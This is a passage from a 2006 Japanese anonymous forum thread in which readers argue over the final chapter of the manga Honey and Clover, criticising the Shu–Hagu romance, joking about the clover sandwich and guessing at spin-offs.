臭はぐと一緒で、
ハチクロサンドが普通に受け入れられてるのが
おかしいんだよ!
竹本が一人で
「はぐちゃん・・・こんなに・・・
 え、でもこれ食えるの?これ俺食うの?クローバーって食用だっけ?
 いやでもせっかく作ってくれたんだし、いけ、竹本、男だろ!!!!!!
(パクッ)・・・・・・・(微妙な半笑い顔)」
だったら良かった。

610 :花と名無しさん:2006/07/29(土) 13:33:02 ID:???0
納得できない、?なマンセーも?な批判も叩かれる
それだけの事じゃないかなあ
批判だけなら何でもおっけーじゃバランス悪いからいいんじゃないの?


611 :花と名無しさん:2006/07/29(土) 13:33:48 ID:???0
携帯とPC・・・・(´<_`  )

612 :花と名無しさん:2006/07/29(土) 13:33:50 ID:???0
>>609
なるほど

613 :花と名無しさん:2006/07/29(土) 13:35:48 ID:???0
>>609
クローバーであの情景を思い出したんだから
それって野暮なんじゃないの?

というか、自分のアイディアの方がいいって言ってる人のって
ことごとくつまらないよ。描きたきゃ自分のノートに描けばいいのに。

614 :花と名無しさん:2006/07/29(土) 13:36:35 ID:???0
>>610
もめるのが掲示板の意味ってことか。

615 :花と名無しさん:2006/07/29(土) 13:36:54 ID:???0
>>609
工エエェェ(´д`)ェェエエ工工

616 :花と名無しさん:2006/07/29(土) 13:38:45 ID:???0
>>613
情景を思い出して感動したって、普通は食べないよ、クローバー

617 :花と名無しさん:2006/07/29(土) 13:39:09 ID:???0
>>609

つ チラシ

618 :花と名無しさん:2006/07/29(土) 13:39:30 ID:???0
ラスト直前の数話はまさに

「カレーライスを食べていたつもりが突然チョコレートカレーとグレープフルーツの炊き込みご飯になっていた」

こんな感じ。
そこさえなければ最終話も普通に見られたんだけどね。
その部分を山田真山と竹本森田に割いていればもっと良かったのにね。

619 :花と名無しさん:2006/07/29(土) 13:40:20 ID:???0
>>616
だとしても、609のマンガは読みたくないな
ハズカシーーー

620 :花と名無しさん:2006/07/29(土) 13:40:25 ID:???O
男はオナニー後に落ち込む生き物だから、結末重視なんだよ。
プロセス重視の女性の方々は、勘弁してあげて。

621 :花と名無しさん:2006/07/29(土) 13:41:21 ID:???0
>620
サムッ

622 :花と名無しさん:2006/07/29(土) 13:42:09 ID:???0
>>620
そのプロセスがクソだから批判されているのであって

623 :花と名無しさん:2006/07/29(土) 13:42:34 ID:???0
>>609はさすがに雰囲気ぶちこわしだが、普通に喰われても困る。
はぐいないんだから、泣きながら「マズイ」くらいは言ってもいいぞ竹本。

624 :花と名無しさん:2006/07/29(土) 13:43:48 ID:???0
>>620
どの意見に対して?
読み取れないアテクシがバカでつか?

625 :花と名無しさん:2006/07/29(土) 13:46:43 ID:???O
ハチクロはファンタジー漫画だから、なんでもあり。

糞なのは、アニメや映画。
これらのせいで「現実ではありえない」とかつまらんこと言い出す馬鹿が紛れ込んで来た。

626 :花と名無しさん:2006/07/29(土) 13:49:01 ID:???0
(1)何だあのやっつけ結末?
(2)何年もかけてまで連載でやる事か?
(3)もっと丁寧に描けよ。
(4)見限っていいかもね。

627 :花と名無しさん:2006/07/29(土) 13:53:00 ID:???0
>>625
そのファンタジーの中にうっすらと打算とかいやらしさとか生臭さが見えてきてるから
ファンタジーを期待してる側にとっても冷や水ぶっ掛けられた気分になるんだよね

ファンタジーのつもりなら最後までファンタジーで通してくれよ、みたいな

628 :花と名無しさん:2006/07/29(土) 13:57:24 ID:???O
ヨツバサンドがぶりんちょは最高のファンタジーだろうが!

629 :花と名無しさん:2006/07/29(土) 14:04:13 ID:???0
>>627
そーそーそーそー
修が男になったりね

630 :花と名無しさん:2006/07/29(土) 14:07:36 ID:???0
>>566
ミーハーだけど、目立ちたがらない?
なんか矛盾してるような・・・

631 :花と名無しさん:2006/07/29(土) 14:13:58 ID:???O
してないだろw

632 :花と名無しさん:2006/07/29(土) 14:25:33 ID:???0
最終回読んできた…
ここで騒動見て覚悟してたからそこまでショックはなし
しゅうはぐ以外はがんばれば受け入れ可能だった

森田は「しきり治してもう一度はぐの前に立つ」ためにピーターのとこへ逝ったんだし
「ずっと見てる」とはぐは答えて実際に覗き部屋してるんだしw
あれはそのうち手が治ったらしゅうちゃんの手を離れて森田ンとこ逝くんじゃないかな


633 :花と名無しさん:2006/07/29(土) 14:30:21 ID:???0
>>632
高村薫もウミノさんも腐女子だからね・・・
恋じゃない!イエー 愛じゃない!イエー とか
男同士とか遠距離とか、そういう「遠くから想い合う何かしらの強い気持ち」
みたいな、ベッタリくっつかないのが萌えるんじゃないかなー。
障害があるほど萌えるというか。

634 :花と名無しさん:2006/07/29(土) 14:45:36 ID:HxBXUrtn0
>632
手が治ったら修捨てて森田のところに行くってのも萎えるな…
スピンオフも何も描かないでこの後は読者妄想にオマカセ!でいいよもう。
単行本で下手な書き下ろしも入れてくれないでいい。

635 :花と名無しさん:2006/07/29(土) 14:50:59 ID:???0
>>634
森田のところへ行くんじゃなくて、せめて森田に触発されて
もちかけられていたイタリア留学するとかの方がいいよね。

636 :花と名無しさん:2006/07/29(土) 15:11:27 ID:???0
最終回を読んだんだけどはぐ関係って雰囲気だけよさげにして中身はひどいよね。
自分を支えてくれる人として修ゲット(はぐ→修としては恋愛感情ではない感じ)、
そして竹本にはクローバーを贈り、森田には「見てる」といいある意味両方キープ状態。

何度も言われてるけど修はぐ部分をもっと上手く描くか、省いてしまったほうが良かったなー。
落ち着きない修とか冷静になると描けなくなるからハイテンションで描いちゃいました☆って見える。

描きたいものはわかるんだけどそこにつなぐまでが上手くできてない印象。
最終兵器彼女みたいに最終巻だけ分厚いとかできなかったのかな。

637 :花と名無しさん:2006/07/29(土) 15:15:31 ID:???0
単に、作者が「これでいいの、素敵☆」と思ってるんだろうね。
作品に酔ってる感じが漂ってるよ。

638 :花と名無しさん:2006/07/29(土) 15:22:33 ID:???0
あ〜この人たちあんなに仲良かったのにバラバラになっちゃうんだ。
青春の楽しい日々は一瞬なんだな。切ないな〜。
と思わせたいのが伝わってくるラスト。でもそれまでに散々
そういうのを強調してきてたから、いい加減しつこくて何の感慨も残らん。

639 :花と名無しさん:2006/07/29(土) 15:25:28 ID:???0
主役は誰だったんだ?語り部な竹本?
だとしたらスピンオフって、単に竹本を除いた続編だったりして。

640 :花と名無しさん:2006/07/29(土) 15:25:42 ID:???0
ほら、誰にでもある青春の一こまでしょ〜
ほっこり、でもときどきしょっぱくて
わかるでしょ〜、懐かしいでしょ〜、切ないでしょ〜〜〜

641 :花と名無しさん:2006/07/29(土) 15:31:46 ID:3fVoIo2w0
今回のラストはとりあえず満足。
タケノコもぎりぎりいい仕事したし。
臭はぐラストを最下級市民の分際で壊したのは見事。


642 :花と名無しさん:2006/07/29(土) 15:34:01 ID:3fVoIo2w0
スピンオフ予想。
・ローマイヤ先輩
・藤原兄弟
・なんとか商店街
・ピーター


643 :花と名無しさん:2006/07/29(土) 15:43:24 ID:???O
だから展開が変だからって
同人や作者頭がどうの ミーハーだから
とか 言うのおかしくね?

644 :花と名無しさん:2006/07/29(土) 15:44:01 ID:???0
スピンオフは野宮とか山崎だってレスなかったっけ。
別冊コーラスに情報が出てた?何て書いてあったのかな…

645 :花と名無しさん:2006/07/29(土) 15:45:35 ID:???0
>>643
いや、別に。

646 :花と名無しさん:2006/07/29(土) 15:51:02 ID:???O
>>645
性格悪いな

647 :花と名無しさん:2006/07/29(土) 15:52:06 ID:???0
ありがと

648 :花と名無しさん:2006/07/29(土) 15:54:46 ID:???0
マジで糞作品だよ。

結局何を伝えたかったのか全く分からない。
女の打算的生き方か?




649 :花と名無しさん:2006/07/29(土) 15:55:44 ID:???O
>>645
イジメしてそ

650 :花と名無しさん:2006/07/29(土) 16:00:33 ID:???0
また携帯から御苦労さんか

651 :花と名無しさん:2006/07/29(土) 16:03:36 ID:???0
お前等誰か四葉じゃなくていいからクローバーで実験しろ


俺はやだ

652 :花と名無しさん:2006/07/29(土) 16:09:28 ID:???0
既出だけど別にタイトルにこじつけなくても良かったと思う。
なんかすごく無理矢理感が…。


653 :花と名無しさん:2006/07/29(土) 16:12:40 ID:???0
ウミノタソも実際にハチクロサンド作って食ってみろ

654 :花と名無しさん:2006/07/29(土) 16:17:58 ID:???0
ふいんき(←ry漫画としてはいいラストでした
作品としてはクソ

655 :花と名無しさん:2006/07/29(土) 16:28:03 ID:???0
はぐの身長が大きいってあったけど、
ハチクロ読んだ後にコーラスの最後の方にある
別冊コーラスの広告のはぐを見ると、はぐがものっそ小さい
いや待て、あれが本来の大きさだったはず、と思い出した
改めて違いすぎ

656 :花と名無しさん:2006/07/29(土) 16:59:52 ID:???0
今日本屋で不思議の国のアリスの文庫本見かけたけど、表紙がなんではぐなのが意味が分からなかった

657 :花と名無しさん:2006/07/29(土) 17:01:01 ID:???O
山田真山サイドはちゃんと話を決着つけたのにね
はぐサイドはなんだかなぁ…
はぐは命=描くことですっていいたかったのか?
ようわからん

658 :花と名無しさん:2006/07/29(土) 17:25:01 ID:???0
はぐじゃなく山田だったら最終回は牛スジ金柑ペーストを塗ったサンドイッチだったな

659 :花と名無しさん:2006/07/29(土) 17:29:51 ID:???0
“NOTHING 修×はぐ”EDITION

CHAPTER.61 P20
h ttp://vipper.jpn.org/www/upload/src/VIPphoto8442.jpg

CHAPTER.62 P19〜20
h ttp://vipper.jpn.org/www/upload/src/VIPphoto8443.jpg
h ttp://vipper.jpn.org/www/upload/src/VIPphoto8444.jpg

CHAPTER.63 P1〜4
h ttp://vipper.jpn.org/www/upload/src/VIPphoto8445.jpg

オマケCHAPTER.63 カラー見開きトビラ
h ttp://vipper.jpn.org/www/upload/src/VIPphoto8446.jpg

竹本&森田による、「俺を選べって言わないんry」「はぐちゃんが先生を選んry」等の
発言に関するシーンは、単に 青春2人組が色恋視点と現実視点とを混同している ものと捉えているので
改変の必要無しと判断。
修による「はぐは返さん」発言は、発せられた時点では ギャグ としての表現に留まるものであるので
これも改変の必要無しと判断。
また、はぐによる「修ちゃんは私の雨」「大事なry」発言も、
この作品内において恋愛の文脈で捉えなければならない絶対的な必然性がある、とは
言い切れないポなので、これまた改変の必要無しと判断。
あと、はぐの「人生ください」発言直後のシーン(「ハハッ」)で
修の頬に(森田に殴られた痕とは別の)斜線が入る描写がなされているが
あの時点で恋愛感情の表現と捉えなければならない、作品内における絶対的必然性は無いので改変の必要無しと判断。

がんがってみたけどダメポだった \(^o^)/      
神 だれか たのむ       

660 :花と名無しさん:2006/07/29(土) 17:31:44 ID:LUgq3kxVO
ここでかなり叩かれてたから、ビクビクしながら読んだよ。
いいラストだと思ったけどなー。森田さんが居なかったのは寂しかったけど。
ピーターで笑い取りつつ(「帯腕(椀?) 毛延」が特にw)、森はぐもあって竹本君の旅立ちもあって。普通に泣きそうになった。羽海野さんの良いトコが出てて良かった。…なんかマンセーぽいが。

ところで、スピンオフって何?

661 :花と名無しさん:2006/07/29(土) 17:32:15 ID:???0
>>609
これ同意。
たけのこは、にんじん生で食っただけの森田に「腹こわしますよ」と言った良識派だったはずだ!

たとえば、今「ハチクロサンドはねーだろw」って言ったら
「いくらなんでもウミノさん常識ないな…メルヘンったって…」ってニュアンスになるけど、
たけのこが最後にボソっと、でもクローバーって食えるっけ、と言うだけで
「ハチクロサンドはねーだろw」が「最後まではぐ料理食わされてたけのこカワイソスwはぐバカスw」
と作品に対して好意的な意味になる気がする。
たけのこがつっこんでくれないと、冗談なのか本気なのかわからないんだよ。

662 :花と名無しさん:2006/07/29(土) 17:32:29 ID:TX99DP1RO
皆さん必死ですねw

663 :花と名無しさん:2006/07/29(土) 17:34:26 ID:???0
IDの最後がOだとケータイなんだっけ?

664 :花と名無しさん:2006/07/29(土) 17:37:44 ID:TX99DP1RO
皆さんたかだか漫画に必死ですねw
そんなに真剣に読んでたんですか★
そんな皆さんGJ★みたいなテヘ
ヲタがアンチに変わるのが1番怖いっていうけど
本当だ。はわーーっ
自分好みの結末を自分で書いてみればいいんじゃないでしょうか?
皆さん漫画に夢中なんて小学生レベルですね☆


665 :花と名無しさん:2006/07/29(土) 17:37:44 ID:???0
カイワレ大根みたいなもんだよクローバーなんて
多分

666 :花と名無しさん:2006/07/29(土) 17:39:08 ID:???0
>>661
どうみても本気だが?

667 :花と名無しさん:2006/07/29(土) 17:39:20 ID:???0
>>662
変えたつもりかも知れないけど
すごい文体にクセがあるから、ばれたくないなら治しなね(´・ω・`)

668 :花と名無しさん:2006/07/29(土) 17:41:29 ID:???0
>>666
本気なのか・・・
はぐ料理の延長として半分ギャクで捉えるべきか、
それともウミノさん的には本気でロマンチックなエピソードなのか、
迷ってたんだが。まさか前者とは・・・

669 :花と名無しさん:2006/07/29(土) 17:42:28 ID:???0
あれがギャグラストにみえるのがどうかしてる

670 :花と名無しさん:2006/07/29(土) 17:42:48 ID:???0
>>665
わたしはハチミツとカイワレでも嫌です☆

671 :花と名無しさん:2006/07/29(土) 17:44:23 ID:???0
ギャグとは行かないまでも、半分冗談でしょ?
はぐ山田のビックリ料理とつなげたんでしょ?

672 :花と名無しさん:2006/07/29(土) 17:44:29 ID:???O
麻痺があるはずの手で二人乗りして
麻痺があるはずの手でサンドイッチ作り
麻痺があるはずの手でしっかり弁当握ってるからもう治ったんだねはぐ




673 :花と名無しさん:2006/07/29(土) 17:44:50 ID:???0
あ〜腹減った
ちょっとクローバー食ってくるノシ

674 :花と名無しさん:2006/07/29(土) 17:44:57 ID:???0
単行本は買わないけど、イラスト集なら買うから出してくれ

675 :花と名無しさん:2006/07/29(土) 17:45:05 ID:TX99DP1RO
>>667
変えたってなぁ〜に?
ここのスレの住人作者に全員片思い☆って感じですね
キャピ★
真剣に語っちゃってw
友達にいい歳して漫画読んでます☆なんて言えないゾ★みたいな
はわーーっ

676 :花と名無しさん:2006/07/29(土) 17:45:54 ID:???0
いたいたしいよオマイ・・・

677 :花と名無しさん:2006/07/29(土) 17:46:05 ID:???O
なんだかんだ言って、ここに書き込む人は良くも悪くも、ハチクロに影響されてるんでしょうね。

マンセーもアンチも自分の意見を言いたくて仕方ないって感じ。おもしろいなぁ。

678 :花と名無しさん:2006/07/29(土) 17:46:31 ID:???0
>>673
四葉はうまいけどなかなか無いんだよね。
自分はいつも三つ葉で我慢してるよ。

679 :花と名無しさん:2006/07/29(土) 17:47:00 ID:TX99DP1RO
とゆう訳で休憩終わるので仕事してきます
暇つぶしになりました。
ありがとうございました。

680 :花と名無しさん:2006/07/29(土) 17:47:10 ID:???0
意外といけるかもよ

681 :花と名無しさん:2006/07/29(土) 17:48:18 ID:???0
>>659
ttp://vipper.jpn.org/www/upload/src/VIPphoto8445.jpg
↑これいいね

682 :花と名無しさん:2006/07/29(土) 17:48:31 ID:???O
某漫画も最終回でそれ見たらあまりの酷さに憎しみと怒りがでて.....
その後ハチクロ最終回見たら 泣きそうになった 普通にいあ最終回だったよ
ハチクロは!!!
ハチクロありがとん
某漫画 しね

683 :花と名無しさん:2006/07/29(土) 17:49:40 ID:???0
>>
携帯臭
クローバーでも食って仕事頑張れ☆

684 :花と名無しさん:2006/07/29(土) 17:49:41 ID:???0
>>677
マンセーもアンチ意見もなんとも思わないけど
この手の意見を書き込む人は苦手だわ
勝手に心の中で思ってりゃいいのに…

685 :花と名無しさん:2006/07/29(土) 17:50:33 ID:???O
まぁ、一般の読者は2ちゃんなんてみないからねー。ここで意見を言う人は、批評家気取りのヲタだけだから。

自分も含めてね。

686 :花と名無しさん:2006/07/29(土) 17:52:09 ID:???O
>>684
図星だからでしょう


687 :背の高いブ男:2006/07/29(土) 17:56:17 ID:/ex1RS2s0
そうだね。


688 :花と名無しさん:2006/07/29(土) 17:57:02 ID:???0
ていうか掲示板てそんなに同じ人がずっといるもんなの?
みんな言いたいこと書いてさっさと去ってくんじゃないの?
一人一人がちょこちょこ書いてこの量になってるだけで
みんな必死、とか、ここにいる人は、とかいう言い方はちょっと的はずれな気がするんだけど。

689 :花と名無しさん:2006/07/29(土) 18:01:18 ID:???O
いま山手線のハチクロ電車に乗ってます。
結構イラストのパターン多彩だね。

690 :花と名無しさん:2006/07/29(土) 18:03:02 ID:???0
>>659
これってなんか直してあんの?

691 :花と名無しさん:2006/07/29(土) 18:05:23 ID:???0
>>690
違和感ないよね。

692 :花と名無しさん:2006/07/29(土) 18:05:56 ID:???0
>>691
どこ直してある?
すごいね、全然わからない。

693 :花と名無しさん:2006/07/29(土) 18:07:32 ID:???0
だいすきだ!のとこだけ分かった。

694 :花と名無しさん:2006/07/29(土) 18:10:10 ID:???0
>>687
ごめん、なんか、名前見ただけで涙出てきた。イ`

695 :659:2006/07/29(土) 18:11:03 ID:???0
>>692 アリマト。
「どこ」を「直した」ってよりかは、

「ガッツリけずった」・・・ 結果、ギャグにしかならなかった、とw

696 :花と名無しさん:2006/07/29(土) 18:12:42 ID:???0
前スレの画バレさんのファイルが消えている…
もう一度上げてはもらえないでしょうか?

今すぐに見たいのですが
近所にコーラス売っていないのです。

697 :花と名無しさん:2006/07/29(土) 18:28:32 ID:???0
>>696
前スレ961は自分だけど
・・・スマソ、親ファイルもう全部削除しちまったもので
再うpはムリですorz

698 :花と名無しさん:2006/07/29(土) 18:33:51 ID:???0
wを多用するケータイさんって、
要するにハチクロが好きでハチクロの文句を言われるのが嫌なの?
それとも、何にもならないのに愚痴るばっかりのスレ住民が嫌なの?
前者ならちゃんと自分の意見を言って納得させられるようにかばうべきだし
後者ならスレを見ないしかないと思うよ。
皆の神経逆なでしたいだけにしては必死すぎるようだけど、結局何がしたいのか分からないです。
それとも好きなキャラが批判されるのが嫌とかそういうのですか?
いらしたら返事ください、ケータイ臭さん。


699 :花と名無しさん:2006/07/29(土) 18:34:39 ID:Rylzz/t50
藤原デザインが出てきてから劣化がはじまって
ここまで堕ちるとは、作品のレベルが…。

野宮と山田の会話、ウザかった。
山田が真山以外の男のために泣いたところを見て「こいつ
(商店街の人じゃなければ)誰でもいいんじゃん」と思った。
野宮といて、泣くどころか沢山気づいたら笑ってて
「真山を好きなころってこんなに笑ってたっけ?私」みたいな
ベタだけど、そういう差を出せばよかったけど、ネチネチした
いやらしさに加速がかかった感じ。野宮魅力無いし。

700 :花と名無しさん:2006/07/29(土) 18:35:10 ID:???0
コーラス付録つけんなよ!テープかかってて読めねえよ!買うのはしゃくだしよ!

701 :696:2006/07/29(土) 18:35:29 ID:???0
>697
早急なレスどうもです。
ファイル削除してしまいましたか、それは残念ですね…

見逃してしまったのは自分なので…ありがとうございました。

702 :花と名無しさん:2006/07/29(土) 18:41:08 ID:???0
腐ってくキャラクターがいるのは漫画の味だと思うが、
この漫画の場合、作者は腐らせてるつもりないんだよね。
だから登場人物たちはその腐敗を絶賛するんだよね。
それが読者には違和感。
そのズレがちょっとずつ目立ってたって感じ?

真山のストーカーはゲッと思ったが結構笑えたし、
漫画の中でもネタにされてたし悪くなかったけど、
山田・・・そしてはぐみ・・・きわめつけが修・・・彼らはもう。

703 :花と名無しさん:2006/07/29(土) 18:47:25 ID:???0
ウミノさんって普通に就職とかしてたんでしょ?
一般常識ありそうだけど
この感覚の差はどっから来るのかなー


704 :花と名無しさん:2006/07/29(土) 18:48:15 ID:???0
>>672
9巻〜先月までは時間経過が遅かったけど、今月は森田パートと竹本inアパートの間で多分3〜5ヶ月経ってるから
単純作業なら大丈夫なんでしょう。

705 :花と名無しさん:2006/07/29(土) 18:53:36 ID:???O
>>703
どゆこと?

706 :花と名無しさん:2006/07/29(土) 18:53:38 ID:???0
>>686
不快に感じるのはもちろんそれもあるけど、
上から目線のいい方やスレ違いってのもある

707 :花と名無しさん:2006/07/29(土) 19:03:13 ID:???O
山田が野宮と笑うのはこれからってことじゃないか?
お互い素直になってやっと二人の関係が始まったって感じで良かったけど…

幸せそうな二人も見たかったけど本編でそれ描いちゃうと叩く読者もいるだろうしね

708 :花と名無しさん:2006/07/29(土) 19:10:16 ID:???0
叩くとか気にする人だったらこの展開にはもってかない気がするなぁ。

709 :花と名無しさん:2006/07/29(土) 19:11:17 ID:???0
そういやクローバーみたいなへにょいのをつまんで
パンに挟むって、ちゃんと握力戻ってないと辛くないかね?

710 :花と名無しさん:2006/07/29(土) 19:13:16 ID:???0
左手があるべや

711 :花と名無しさん:2006/07/29(土) 19:14:38 ID:???0
>>704
そうなんだ!
じゃあ森田は竹本の出発の時にはもうピーターのとこなのかな。

712 :花と名無しさん:2006/07/29(土) 19:16:28 ID:???O
山田はやっと野宮に正直になったようでよかったけどな。
次に載るスピンオフの主人公が誰になるか楽しみ。

713 :花と名無しさん:2006/07/29(土) 19:18:28 ID:???0
でもほんと、
もうちょっとケガの苦悩を見せてくれないと、
仕事やめたりとか・・・
人生もらうとか・・・
おいおい・・・
やっぱりみんな気が動転して話大きくしすぎちゃったの?
家族の病気が発覚した時とかも
最初は「これからどうなるのー!?」とか思うのに
実際はあんま生活変わらなかったりするみたいな
そんな感じで?


714 :花と名無しさん:2006/07/29(土) 19:20:08 ID:???0
>659
ちょww修はぐフツーに無かったことになってるww
G☆J

715 :花と名無しさん:2006/07/29(土) 19:24:11 ID:???0
>>713
たしかにあれじゃ、みんなが大袈裟すぎたように見える。
リハビリがんばってるとことか描かないのか

716 :花と名無しさん:2006/07/29(土) 19:28:26 ID:???0
>>659を見ると本当に修の恋心は必要じゃないと思う。
修過保護すぎとは思うけど
今までのように親子愛+はぐがここまで歩かせてくれたからお礼+父親再婚で同情
と要素もそろってるんだから、そのまま面倒見ても違和感ない。

717 :花と名無しさん:2006/07/29(土) 19:31:07 ID:???0
てんてー、噂の659が見れまてん。

718 :花と名無しさん:2006/07/29(土) 19:31:50 ID:???0
概出だったらすまんが、
「コーラス」って、最終回を前月予告したり、
表紙や巻末の編集者コメントにも
「最終回」って触れないの?

719 :花と名無しさん:2006/07/29(土) 19:37:40 ID:???0
>>711
だと思うよ。
森田以外が集まってるときのライブカメラも@仕事場(=ピーターのところ)ってなってるし。

最終回見て思ったんだけど、修はぐの部分って森田死亡エピの代わりに入れたんじゃないかな?
もう集まれないって話からもしかしたら会えるかもに変えたみたいな話もあったし。
最後にはぐは修と一緒に生活する事になり、はぐ周りは恋愛的には誰とも結ばれないっていう
部分だけ規定どおりってことで。

それにしても作者、完結前に色々喋りすぎ。9巻の巻末漫画のタイトルの元ネタ話聞く前に
最終話を味わいたかった。

>>718
ハチクロ以外ではクライマックス=最終回という事だったみたい。

720 :花と名無しさん:2006/07/29(土) 19:39:15 ID:???0
まだコーラス読んでないからよく分からないんだけど、
はぐが森田の部屋モニターでのぞいてるってのはなんなの?
森田の部屋ってのは、あのドスコイ喫茶ジュテームみたいな宇宙船部屋のこと?


721 :花と名無しさん:2006/07/29(土) 19:40:01 ID:???O
そうだね
はぐ-これからも絵を書いていきたい
修-はぐと一緒に世界をみたい
これでOKだったね
どっちも望んだ夢叶うんだし
恋愛はいらんかったね

722 :花と名無しさん:2006/07/29(土) 19:48:20 ID:???0
帯椀毛延って何のことかと思ったら
スターヲーズネタなのな・・・

723 :花と名無しさん:2006/07/29(土) 20:00:33 ID:???0
呑み屋へ対してあそこで泣く山田がやだな。
絵もあれだが幼稚性がなんとも。

724 :花と名無しさん:2006/07/29(土) 20:08:06 ID:???0
てか山田云々以前にイタイ女ばっかりジャンw
しかもちっとも成長しないで打算的生き方に終始。

725 :花と名無しさん:2006/07/29(土) 20:09:20 ID:???0
もしかしてハチクロの裏テーマって、人は恋をすると退化する――とかだったりする?

726 :花と名無しさん:2006/07/29(土) 20:14:30 ID:???0
元からそんな偉大なもんじゃない>恋
どうなるかは所詮人次第でしょ。

727 :花と名無しさん:2006/07/29(土) 20:19:22 ID:???O
あってもなくてもいい最終回だったな
スピンオフは3話はやりそう
飲み屋山田 真山リカ 臭はぐ森田竹本

728 :花と名無しさん:2006/07/29(土) 20:21:48 ID:???0
やると思う
なんかのインタでいってた気がする

729 :花と名無しさん:2006/07/29(土) 20:51:56 ID:???0
>>719
ななななにそれ!?
部屋のぞいてるって仕事場のこと?
「ずっと見てる」ってそういう意味?
はぐみちゃんもストーカーになりました、おしまい。って話?
なんで今まで誰もつっこまなかったの?
漫画読めば納得できるの?

頭が?でいっぱいです。

730 :花と名無しさん:2006/07/29(土) 20:59:18 ID:???0
>>729
本誌読んだ。べつにはぐが仕掛けたわけじゃないと思うよ
前、森田が山田に「今度行くときはテレビ電話云々」って言ってたじゃん
森田あれ覚えてたのか、とホンワカしてしまった

確かに唐突だったけど、ハチクロサンドのインパクトには負ける

731 :花と名無しさん:2006/07/29(土) 21:00:24 ID:???0
>>729
実際そーゆー意味かもしれない。
それでもって
「ずっと見てるって、文字どおりまんまやんけ」
という、壮大なベタネタギャグかもしれない。


でも、それもまた味があっていいかもしれませんね。

732 :花と名無しさん:2006/07/29(土) 21:03:47 ID:???0
つまりこの最終回は
ハチクロサンド・はぐの真山化という壮大なギャグを
お別れの感傷でしっぽり包み込んだ
そんな感じ?

733 :花と名無しさん:2006/07/29(土) 21:04:32 ID:???0
そりゃ確かにがんばるしかないわな・・・24時間見張られてちゃな・・・

734 :花と名無しさん:2006/07/29(土) 21:08:12 ID:???0
>>732
そう思うとなんだな
高度な終わらせ方だな

735 :花と名無しさん:2006/07/29(土) 21:09:01 ID:???0
実際に、海外のゲーム会社で社員フロアにライブカメラを設置してるところあるしね。

あれがずっと見てるの現実化だったとは気付かなかったなw

736 :花と名無しさん:2006/07/29(土) 21:11:01 ID:???O
ライブカメラは真山がピーターにまた連絡して、
こっそり仕掛けてもらったんだろうと思っている。

737 :花と名無しさん:2006/07/29(土) 21:13:33 ID:???0
はぐが森田の仕事部屋をうれしそうに見てるのを見て、
はぐと森田はお互いのことを思って高めあっていける関係に
なれるのかもしれないと思った。

そんなはぐを暖かく見つめる臭の「ああ好きさ!大好きさ!!」さえ
なければ、どんなによかったことか…!

738 :花と名無しさん:2006/07/29(土) 21:21:55 ID:???0
リカ、後追いして欲しかった、または死なないまでも思い出だけで生きててほしかった。
生きて真山みたいなの(ものすごいガッツで踏み込んでくる奴)に落ちちゃうなんてちょっとがっかり・・・・。




739 :花と名無しさん:2006/07/29(土) 21:22:56 ID:???0
>>736
いやー、真山にそんな力はないですよ。

740 :花と名無しさん:2006/07/29(土) 21:28:54 ID:???0
>>738
そこには不満無いけど
りかの感情描写もはんぱだったよね。
どこまで修の、自殺したらそれこそ二度と会えなくなるにしばられてて
どっからもう自殺しちゃえってなって
どっから真山でいいかってなったのか。
真山はまだ境目らしきものあるけど、特に上2つ。

741 :花と名無しさん:2006/07/29(土) 21:32:22 ID:???0
何だかんだで理花も真山を頼りにしている内に気に入っていたんでしょ。
最初に好きになった相手に拘って次の相手を認めつつも距離を取るのは、
理花も山田も同じ傾向にある。
ていうか他に恋愛の描き方無いのかウミノ君…

742 :花と名無しさん:2006/07/29(土) 21:32:54 ID:???0
はぐ臭からこんなに早く終わるとは思ってなかったから
コミック売り払っておいてよかった。

743 :花と名無しさん:2006/07/29(土) 21:33:56 ID:???0
あれ、竹本たちは森田がどこ行ったか知らないの?
なんではぐ教えないの?

744 :花と名無しさん:2006/07/29(土) 21:35:28 ID:???0
リカはともかく
野宮と山田まであんな描き方するとは思わなかった。

745 :花と名無しさん:2006/07/29(土) 21:36:48 ID:???O
>>604
同人女の被害妄想乙
私怨叩きじゃなくて本人がプロとして疑問のある行動取るから叩かれるんだよ。一方的に認定しないでくださいね。

746 :花と名無しさん:2006/07/29(土) 21:38:43 ID:???O
>>613
私怨乙

747 :花と名無しさん:2006/07/29(土) 21:39:45 ID:???0
>>742
正直あと2話くらいはぐ臭続く覚悟してたから拍子抜け。
今ならハチクロ200円くらいで売れるかな。たしか帯取ってないはず。

>>745
これ被害妄想っていうのか・・・?

748 :花と名無しさん:2006/07/29(土) 21:41:53 ID:???0
なんかもう私怨とか被害妄想とか使い方間違ってるぞ

749 :花と名無しさん:2006/07/29(土) 21:43:21 ID:???O
>>643
どうせたいして情報持ってないんだろ
もっと作品や作者勉強しろ

750 :花と名無しさん:2006/07/29(土) 21:44:06 ID:???0
>>748
覚えたての言葉って使いたくなるものなのでしょう

751 :花と名無しさん:2006/07/29(土) 21:45:19 ID:???0
>>747
自分が売った時は一冊200円で売れた。
2、3ヶ月ぐらい前かな。

752 :花と名無しさん:2006/07/29(土) 21:46:32 ID:???0
ここまで終わり方がやる気ないと、
番外編も期待しない方がよさそうだな・・・

山崎と美和子のその後とかはちょっと興味あったが
本編ちゅうぶらりんなまま脇役の話完結させられても困るしな。

ところで将棋漫画もこの画風で行くの?青年誌で。

753 :花と名無しさん:2006/07/29(土) 21:47:10 ID:???O
>>660
つ[チラシの裏]

754 :花と名無しさん:2006/07/29(土) 21:47:46 ID:???0
>>751
えーっ
映画公開待ってからの方がいいかなとホクホク温めてたのに。
早く売っちゃえばよかった。

755 :花と名無しさん:2006/07/29(土) 21:48:57 ID:???0
サルベージ?>ケータイ臭

756 :花と名無しさん:2006/07/29(土) 21:50:23 ID:???0
>>752
多少は変わるかもしれないけど
あらかたこのままなんじゃないかな。
というか他の画風では描けないんじゃ?

羽海野って手フェチっぽいから将棋好きそう。

757 :花と名無しさん:2006/07/29(土) 21:51:22 ID:???O
いくら外見が幼くてもハグは女。
修ハグは、気持ち悪い程、依存しあっているんだから、
いっそカラダも結ばれていた方が納得いくな。


てか、ハグって作りたい気持ちは人一倍強いけど、
人間的に中身がないのでアーチストには向いてないと思う。
作品に自分のカラーが全くないし、テーマもなしに創作してんじゃねーよ、と読む度にむかついてたよ。
思い込みで美術に命かけている奴は五万といる。
ハグは特別でも何でもないただの勘違い女だ。

758 :花と名無しさん:2006/07/29(土) 21:51:52 ID:???0
自分は250円で売ったお(^ω^)
8巻までで2000円になったお(^ω^)

759 :花と名無しさん:2006/07/29(土) 21:55:02 ID:???0
>>757
それは、作者の力量不足なんだろうけど、確かに思った。
作品に自分の雰囲気がないよね。
最初の男像とかはギャグのつもりなんだろうけど、
